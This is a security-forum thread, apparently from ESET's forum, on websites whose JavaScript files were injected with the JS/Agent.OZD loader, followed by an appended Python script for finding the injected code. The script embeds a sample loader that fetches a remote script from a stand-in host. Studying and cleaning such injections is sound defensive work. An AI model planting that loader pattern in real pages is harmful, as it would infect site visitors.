Hapkido, posted May 22, 2021:
About 2 days ago, ESET Internet Security (14.1.20.0) flagged my personal forum because it intercepted the "JS/Agent.OZD" trojan. I've had this forum for 20 years and never had a problem with security issues. I suspect that this item was recently added to the ESET list? The problem has been reported to my host provider's tech team and their scans didn't detect anything. The practical issue is that some of the features of the forum are disabled, e.g., the text box for starting new discussions or replying to one is missing. Other affected features include the "Quote" feature, and a few others. Disabling ESET resolves those problems. I suspect that this is a false positive. I think JavaScript items are being flagged. What can I do to resolve this issue without creating a real risk? TIA
Marcos (Administrator), posted May 22, 2021:
Your website was compromised; the detection is correct. Unfortunately you didn't enclose the URL of your website.
Hapkido (author), posted May 22, 2021:
hxxp://the-highway.com/forum/
Marcos (Administrator), posted May 22, 2021:
These are the files that are infected:
jquery.lightbox-plus-rotate.min.js
image.js
quickquote.js
There may be more of them; I've found these while quickly browsing through the website.
Hapkido (author), posted May 22, 2021:
I'm checking with the coders of the forum software to see if those 3 files are legitimate. I'll let you know when I get their response. If they are, is it possible that they can be corrupted yet retain the original file name?
Marcos (Administrator), posted May 22, 2021:
The files are legitimate; however, malicious JS was injected into them.
Hapkido (author), posted May 22, 2021:
Gotcha! The important question for me now, which I don't expect you or anyone else to know, is: HOW did someone gain access to those files?
peteyt (Most Valued Member), posted May 22, 2021 (edited):
Quoting Hapkido: "Gotcha! The important question for me now, which I don't expect you or anyone else to know, is: HOW did someone gain access to those files?"
I presume, being JS, it is a JavaScript injection. I don't really know a lot about code but found this article: https://sectigo.com/resource-library/how-can-a-person-inject-a-malicious-script-to-a-website
It seems to suggest checking that all scripts and so on are up to date, but I'm not sure what else you could do. Maybe your host will also have some services. If you use forum software with add-ons, it could be an insecure add-on that has caused the issue, e.g. an add-on has a vulnerability that allows some access. I'd also make sure any passwords you use are hard to guess and unique.
Hapkido (author), posted May 23, 2021:
Marcos, I replaced the 3 files you found that you believe were infected, and that resulted in no further alerts from ESET. I did ask my host provider to compare the 3 alleged infected files with the replacement files to identify the injected script. They did that and reported that 16 other files have that same code. I copied the actual code into a new text file and then did a manual scan of it, and ESET said it was clean. So, before I replace all 16 files, can you positively identify that this code is malicious?
Attachment: forum infected files & locations.txt
Marcos (Administrator), posted May 23, 2021:
Yes, that's the malicious code that must be removed. The files were not detected by the on-demand scanner because it's a web threat which is detected by the script scanner and web access protection, plus the detection has not been fully released yet. Before you replace the files with clean ones, please provide me with the-highway.com/ubbthreads-7-6-0/ubbthreads-7-6-0.php.
Hapkido (author), posted May 23, 2021:
Understood. The requested file is attached. I added the ".txt" extension so I could upload it here.
Attachment: ubbthreads-7-6-0.php.txt
Hapkido (author), posted May 28, 2021:
Quoting Marcos: "Before you replace the files with clean ones, please provide me with the-highway.com/ubbthreads-7-6-0/ubbthreads-7-6-0.php."
Still waiting for your response/comment before I replace the other 6 files. The problem persists.
Marcos (Administrator), posted May 28, 2021:
No need to wait; go ahead and clean the detected files (i.e. replace them with a clean version). As for ubbthreads-7-6-0.php, it's a heavily obfuscated PHP script. If you don't need it, delete it. If you have a 100% clean version of it and it differs from the one you've sent, replace the file with the original/clean version.
Blackip360, posted May 28, 2021:
Hello, we have a website in production (https://nitalabelingequipment.com) that also gets JS/Agent.OZD detected as a threat when you visit the front page.
- We have downloaded the website's files and run a custom scan on the folder, and no threat was detected.
- ESET marks it as clean in VirusTotal too.
However, we still have the virus alert any time someone with ESET visits the website. How can I tell which files are infected and need to be deleted from the website? Please advise.
Marcos (Administrator), posted May 29, 2021:
Quoting Blackip360: "We have a website in production (https://nitalabelingequipment.com) that also gets JS/Agent.OZD detected as a threat when you visit the front page."
One of the infected files is full-scripts.6.1.5.js. You can find the offending JS at the end of the file. Based on this you should be able to find it in other infected files as well.
CharlieO, posted May 29, 2021:
We have several websites on our dedicated server and all of them also get JS/Agent.OZD detected as a threat when you visit the front page. (We have licensed ESET on all our computers.)
www.traiva-shop.cz
www.safetutor.cz
www.safetutor. org
www. traiva.cz
We did find some infected files using the ESET online scanner on our server. The questions:
1. Is it possible to find the vulnerable file(s) on our websites (the file that the attacker used to inject the virus code)?
2. Is it possible to install ESET on our server (Windows Server 2003)? We did try it, but with no success.
Marcos (Administrator), posted May 29, 2021:
1. No. It may not necessarily have been a malicious file that injected the code, and even if it was a file, it probably no longer exists. It could have been a vulnerable CMS plug-in that was exploited. To find out the infection vector on Windows systems, we recommend using ESET Enterprise Inspector, which is able to show you the path of infection, among other things. Of course, EEI must be installed before a security incident occurs.
2. The latest version of EFSW that can be installed on Windows Server 2003 is EFSW 6.5. However, this version is quite old and will reach EOL in Dec 2022. Moreover, since Microsoft stopped issuing security updates for WS 2003 years ago, this OS is insecure and vulnerable, and installing antivirus will not secure it enough.
In order to remove the malicious JS, check one of the files detected by ESET, locate the malicious JS in it (typically at the end of the file) and search for the same code in other files on the server. Check also the PHP file which is referenced by the malicious script and make sure there's no redundant malicious code (in your case it's bozp_demo_dokumentace_puvodniOK.php, for instance).
Pinky1, posted June 27, 2021:
Hello, I visited a website on which ESET (installed on my PC) detected JS/Agent.OZD. But the website had already opened by that time. So is there any chance that my PC has got infected with the virus? The message from ESET was that the access had been blocked.
Thanks and regards, Pinky
Marcos (Administrator), posted June 27, 2021:
Quoting Pinky1: "So is there any chance that my PC has got infected with the virus?"
There's no chance you could get infected with the threat that was detected and blocked by ESET.
daylon, posted June 29, 2021:
Hi, we have a machine that was infected with this yesterday. ESET PROTECT shows that it has not been handled by the product. Please assist.
Regards, Daylon
Nightowl (Most Valued Member), posted June 29, 2021:
Quoting daylon: "Hi, we have a machine that was infected with this yesterday. ESET PROTECT shows that it has not been handled by the product. Please assist. Regards, Daylon"
Try to clean the browser's data, like the cache and so on. You can also remove that JS manually by deleting it from the folder path, or by running a scan; ESET should pick it up and remove it. Also try to refrain from using IE; Microsoft is killing that browser and it will soon be retired.
Marcos (Administrator), posted June 29, 2021:
Most likely you have SSL filtering disabled on clients; please check that. As long as HTTP(S) communication is filtered and scanned, possible threats on websites are intercepted and blocked at the network level. With SSL filtering disabled, web files are cached and saved to the disk, at which point possible threats are detected by real-time protection.
Jairo, posted July 1, 2021:
Hi, I have an alert on https://novatecagriculture.com/ for JS/Agent.OZD, but I can't figure out which files are compromised. Can somebody help me please?
Marcos (Administrator), posted July 2, 2021:
Quoting Jairo: "Hi, I have an alert on https://novatecagriculture.com/ for JS/Agent.OZD, but I can't figure out which files are compromised. Can somebody help me please?"
Searching for "/arroz/arroz.php?id=" in all html/js files on the website should help you locate the malicious JS.
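One way to carry out the cleanup Marcos describes in this reply and earlier in the thread (take one flagged file, compare it with the clean copy from the forum software distribution to extract the appended code, then search every html/js/php file on the server for that same code or for the beacon URL it loads), as an added example that is not part of the original thread and not an ESET tool. The web root, file contents and the example.invalid domain below are constructed for the example; the marker string "/arroz/arroz.php?id=" is the one quoted above, but the sample loader around it is invented.

```python
"""Locate injected JavaScript across a web root (added example).

Workflow: take one file the scanner flagged, obtain its clean counterpart
from the forum/CMS distribution, extract the bytes the attacker appended,
then search every html/js/php file for the same payload or for a marker
string such as the beacon URL. All sample data here is constructed.
"""
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

TEXT_SUFFIXES = {".js", ".html", ".htm", ".php"}

# Constructed sample data: a legitimate-looking script and an appended loader
# that pulls a second stage from an attacker-controlled URL (domain invented).
CLEAN_JS = b"(function(){window.lightbox={open:function(){}};})();\n"
PAYLOAD = (b"\n;(function(){var s=document.createElement('script');"
           b"s.src='//example.invalid/arroz/arroz.php?id=1';"
           b"document.head.appendChild(s);})();\n")
MARKER = b"/arroz/arroz.php?id="


def injected_suffix(clean: bytes, infected: bytes) -> Optional[bytes]:
    """Return what was appended to the clean file, or None when the infected
    copy is not simply clean + payload (then a real diff is needed)."""
    if len(infected) > len(clean) and infected.startswith(clean):
        return infected[len(clean):]
    return None


def find_marker(root: Path, marker: bytes) -> List[Tuple[Path, int]]:
    """Return (path, byte offset) for every text file under root containing marker.
    Searching raw bytes avoids decode errors on mixed encodings or binary junk."""
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        offset = path.read_bytes().find(marker)
        if offset != -1:
            hits.append((path, offset))
    return hits


def build_sample_site(root: Path) -> None:
    """Write a constructed web root: two infected files, two clean ones."""
    (root / "js").mkdir(parents=True, exist_ok=True)
    (root / "js" / "image.js").write_bytes(CLEAN_JS + PAYLOAD)      # infected
    (root / "js" / "quickquote.js").write_bytes(CLEAN_JS)           # clean
    (root / "index.html").write_bytes(
        b"<html><script>" + PAYLOAD + b"</script></html>\n")         # infected
    (root / "config.php").write_bytes(b"<?php $debug = false; ?>\n")  # clean


def run_demo() -> dict:
    """Build the sample site in a temp dir and run both searches over it."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    build_sample_site(root)
    suffix = injected_suffix(CLEAN_JS, (root / "js" / "image.js").read_bytes())
    # Search for the exact extracted payload first, then for the shorter
    # marker, which also catches variants that were re-obfuscated but still
    # point at the same beacon URL.
    by_payload = find_marker(root, suffix) if suffix else []
    by_marker = find_marker(root, MARKER)
    return {
        "suffix": suffix,
        "payload_hits": sorted(p.relative_to(root).as_posix() for p, _ in by_payload),
        "marker_hits": sorted(p.relative_to(root).as_posix() for p, _ in by_marker),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

On a real server, point find_marker at the document root and replace CLEAN_JS with the bytes of the vendor's original file. If injected_suffix returns None, the attacker did not simply append code; diff the two files properly, since the injection may sit in the middle or the whole file may have been rewritten. Note also that a scan limited to script and HTML suffixes will miss code hidden in files with other extensions, so after cleaning, run the marker search over every file type as well.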
daylon, posted July 2, 2021:
Hi Marcos and Nightowl, thank you for your feedback, much appreciated.
Regards, Daylon